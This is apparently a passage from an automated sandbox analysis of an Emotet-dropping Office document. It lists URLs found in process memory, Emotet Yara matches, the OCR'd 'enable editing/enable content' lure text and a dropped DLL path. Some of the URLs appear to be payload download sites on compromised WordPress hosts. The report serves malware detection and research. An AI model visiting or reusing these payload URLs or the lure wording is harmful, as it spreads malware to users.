Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://indianpornmovies.info/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://kashtanka.tv/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/7days-7-poriyal-recipes-poriyal-varieties-in-tamil-poriyal-recipe
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/beyond-keto-virtual-summit-the-mid-life-re-life-blueprint-program
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/my-southern-keto-kitchen-cookbook-how-i-got-here/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/my-southern-keto-kitchen-cookbook-how-i-got-here/#respond
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/pepito-manaloto-keto-diet-sagot-sa-katabaan-ni-mara/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/pepito-manaloto-keto-diet-sagot-sa-katabaan-ni-mara/#respond
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/the-ketonian-cookbook-quick-and-easy-low-carb/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/what-i-eat-to-lose-weight-2020-easy-keto-recipes-keto-full-day-ea
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/#respond
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/about-us/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/author/admin/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/eating-keto-style/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/food-receipes/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/health/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/keto-cookbook/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/keto-diet/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/keto-news/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/keto-summit/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/keto/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/category/weight-loss/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/comments/feed/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/contact-us/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/feed/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/privacy-policy-2/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/shop/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2020/09/11.jpg
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2020/09/12.jpg
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2020/09/reclama-lifestyle.jpg
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2020/09/ttt.png
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/7days-7-Poriyal-Recipes-Poriyal-Varieties-in-Tami
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-B
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jp
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.j
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/My-Southern-Keto-Kitchen-Cookbook-HOW-I-GOT-HERE-
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Ma
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-218
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogen
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-json/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/xmlrpc.p
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/xmlrpc.p0
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/xmlrpc.php?rsd
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://login.windows.local
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://management.azure.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://management.azure.com/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://messaging.office.com/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://ncus-000.contentsync.
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://ncus-000.pagecontentsync.
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://nesaporn.mobi/
Source: powershell.exe, 00000004.00000002.290367412.0000018A24216000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://officeapps.live.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://onedrive.live.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://onlyindianporn.me/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://outlook.office.com/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in binary or memory: https://phawayagency.com/wp-admin/mXo4b/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://rajwap.me/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://rajwap.pro/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp String found in binary or memory: https://rycomputer.com
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in binary or memory: https://rycomputer.com/content/TL/
Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmp String found in binary or memory: https://rycomputer.comx
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://settings.outlook.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://staging.cortana.ai
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: svchost.exe, 00000011.00000002.308260123.000001E8C743D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000011.00000002.308233755.000001E8C7413000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.308260123.000001E8C743D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000011.00000003.307993186.000001E8C7445000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000011.00000003.307993186.000001E8C7445000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000011.00000003.286166612.000001E8C7432000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000011.00000002.308254884.000001E8C743B000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000011.00000002.308278437.000001E8C744E000.00000004.00000001.sdmp String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://tasks.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://templatelogging.office.com/client/log
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://tubepatrol.porn/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: rundll32.exe, 0000000E.00000003.411786554.0000000003271000.00000004.00000001.sdmp String found in binary or memory: https://watson.telemet01/o7vtz/g3p9nxague/
Source: rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmp String found in binary or memory: https://watson.telemet8080/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/comments/feed/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/company/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/company/contact/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/feed/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/services/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/services/air-cargo/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/services/cost-calculators/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/services/courier/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/services/ocean-cargo/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/services/trucking/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/track-and-trace/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/wp-admin/admin-ajax.php
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/wp-content/uploads/2015/09/Cargo-logo-color.png
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/wp-content/uploads/2015/09/Cargo-logo-white1.png
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/wp-content/uploads/2015/12/Transportation-16x16-1.png
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/wp-json/
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/xmlrpc.php?rsd
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://wus2-000.contentsync.
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://xxxthtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown HTTPS traffic detected: 58.97.195.135:443 -> 192.168.2.3:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.214.169.246:443 -> 192.168.2.3:49723 version: TLS 1.2

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 0000000D.00000002.284787283.00000000029E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.470768632.0000000003410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.470794872.0000000003431000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.284845000.00000000041B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 14.2.rundll32.exe.3410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.3410000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.29e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.29e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.41b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.3430000.3.unpack, type: UNPACKEDPE

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. End of document W Screen 1
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. End of document W Screen 1 of 1 O Type here to
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll Jump to dropped file
Very long command line found
Source: unknown Process created: Commandline size = 5389
Source: unknown Process created: Commandline size = 5293
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5293 Jump to behavior
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFAEE111FF8 4_2_00007FFAEE111FF8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFAEE113139 4_2_00007FFAEE113139
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1001C04A 13_2_1001C04A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1001D0AC 13_2_1001D0AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1001C28B 13_2_1001C28B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1003B353 13_2_1003B353
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1003B473 13_2_1003B473
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1001C4BD 13_2_1001C4BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1001C71A 13_2_1001C71A
